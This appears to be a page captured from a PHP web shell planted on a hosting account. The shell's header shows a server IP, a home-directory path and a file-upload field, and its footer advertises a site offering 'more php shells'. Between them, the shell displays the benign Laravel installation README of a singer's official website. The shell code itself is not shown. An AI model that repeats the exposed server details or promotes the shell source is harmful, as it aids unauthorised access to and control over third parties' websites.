Domain: amberpublishers.in
Server Adress: 86.38.243.169

privdayz.com

/home/u866425823/domains/ghazalsingerkamalkhan.com/public_html/
Dosya Yükle :
Current File : //home/u866425823/domains/ghazalsingerkamalkhan.com/public_html/README.md

<p align="center"><a href="#" target="_blank"><img src="public/img/logo/logo.png" width="400" alt="Kamal Khan Logo"></a></p>


## Kamal Khan | Ghazal Mastero.

Offical Website of Singer Kamal Khan- Ghazal Mastero.

## Prerequisites

You should have the following installed on your system in order to run this project:

- PHP 8.0.0 or higher
- Composer 2.0.0 or higher
- Node.js 14.0.0 or higher
- NPM 6.0.0 or higher
- MySQL 8.0.0 or higher
- Git 2.0.0 or higher
- Laravel 8.0.0 or higher
- XAMPP / WAMP / LAMP / MAMP or IIS, with Apache and MySQL running.
- Met all required dependencies for Laravel 8.0.0 or higher as mentioned in the [official documentation](https://laravel.com/docs/10.x/installation#server-requirements).


## Installation

* Clone the repository into your root directory of XAMPP / WAMP / LAMP / MAMP or IIS.

```bash
git clone https://github.com/SubhanRaj/kamalkhan.git
```
* Then run the following commands in the root directory of the project.
* Rename the .env.example file to .env and fill in the required details.
* Create a database in MySQL and fill in the database details in the .env file.
* Generate a new application key.

```bash
php artisan key:generate
```
* Run the following commands to install the dependencies and compile the assets.


```bash
composer install
npm install
npm run dev
php artisan serve
```




coded by Privdayz.com - Visit https://privdayz.com/ for more php shells.